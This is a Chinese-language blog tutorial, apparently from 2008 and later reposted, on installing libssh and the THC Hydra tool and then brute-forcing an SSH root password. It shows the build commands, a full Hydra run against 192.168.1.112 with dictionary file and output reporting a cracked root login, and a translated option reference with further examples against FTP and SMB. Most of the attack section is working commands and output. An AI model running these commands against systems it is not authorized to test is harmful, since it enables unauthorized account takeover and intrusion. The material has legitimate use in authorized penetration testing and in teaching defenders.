1.先安装libssh.[root@localhost ~]# tar -zxvf libssh-0.11.gz[root@localhost ~]# cd libssh-0.11[root@localhost …

 

 

Author : Ecore

Date : 2008/06/15

Website: http://www.ishacker.org

 

http://www.80sec.org

 

1.先安装libssh.

[root@localhost ~]# tar -zxvf libssh-0.11.gz

[root@localhost ~]# cd libssh-0.11

[root@localhost ~]# ./configure

[root@localhost ~]# make

[root@localhost ~]# make install

 

2.到www.thc.org下载最新版hydra并安装

 

[root@localhost ~]# tar -zxvf hydra-5.4-src.tar.gz

[root@localhost ~]# cd hydra-5.4-src

[root@localhost ~]# ./configure

[root@localhost ~]# make

[root@localhost ~]# make install

[root@localhost ~]# ln -s /usr/local/include/libssh /usr/include/libssh

[root@localhost ~]# ln -s /usr/local/lib/libssh.so /lib/libssh.so

 

3.使用hydra破解ssh登录密码

[root@localhost ~]# hydra -l root -P ~/passwd.dic 192.168.1.112 ssh2 //使用-o file参数,可以记录日志

Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.

Hydra (http://www.thc.org) starting at 2008-06-15 23:56:43

[DATA] 16 tasks, 1 servers, 106 login tries (l:1/p:106), ~6 tries per task

[DATA] attacking service ssh2 on port 22

[22][ssh2] host: 192.168.1.112 login: root password: xxxxxxxx

[STATUS] attack finished for 192.168.1.112 (waiting for childs to finish)

Hydra (http://www.thc.org) finished at 2008-06-15 23:57:15

[root@localhost ~]#

 

===================================================================================================

[root@localhost ~]# hydra

Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC

语法: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]

server service [OPT]

 

参数列表:

 

-R 恢复上次停止的破解进度,继续破解

-S 使用SSL连接

-s PORT if the service is on a different default port, define it here

-s 端口号 在这里自定义要破解的端口号(替代默认端口)

-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE

-l 登录名 或者 -L 字典 使用登录名 或者 从字典中获取登录名单

-p PASS or -P FILE try password PASS, or load several passwords from FILE

-p 密码 或者 -P 字典 使用单个密码 或者 从字典中获取密码列表

-e ns 附加选项,n 是表示空密码,s 尝试使用密码进行破解

-C FILE colon seperated “login:pass” format, instead of -L/-P options

-C 文件 使用冒号分割格式 例如 “登录名:密码”来代替-L/-P参数

-M FILE server list for parallel attacks, one entry per line

-M 文件 服务器列表(译者:ip列表),一行一条

-o FILE write found login/password pairs to FILE instead of stdout

-o 文件 将找到的密码写在文件里面 以此代替输出到屏幕上

-f 在使用-M参数以后 找到第一对登录名或者密码的时候中止破解

-t TASKS run TASKS number of connects in parallel (default: 16)

-t 计划任务 同时运行几个任务(默认是: 16)

-w TIME defines the max wait time in seconds for responses (default: 30)

-w 时间 定义超时时间秒数(默认是: 30)

-v / -V 详细显示用户名或者密码的破解过程

server the target server (use either this OR the -M option)

服务器 服务器目标(译者:就是你要破解密码的主机) (你也可以使用-M参数指定)

service the service to crack. Supported protocols:

[telnet ftp pop3 imap smb smbnt http httpshttp-proxy cisco cisco-enable ldap

mssql mysql nntp vnc socks5 rexec snmp cvs icq pcnfs sapr3 ssh2 smtp-auth]

OPT some service modules need special input (see README!)

OPT 一些服务模块需要特别的语法输入(详细请看5.特别参数模块)

 

两个例子:

hydra -l login -P /tmp/passlist 192.168.0.1 ftp

login为要破解的用户名,passlist为密码字典库

 

hydra -l login -P passfile 192.168.0.1 smb

login为要破解的登录名,passfile为密码字典库,smb操作系统登录密码破解

 

 

版权声明:本文为weaver1原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/weaver1/archive/2012/03/20/2407243.html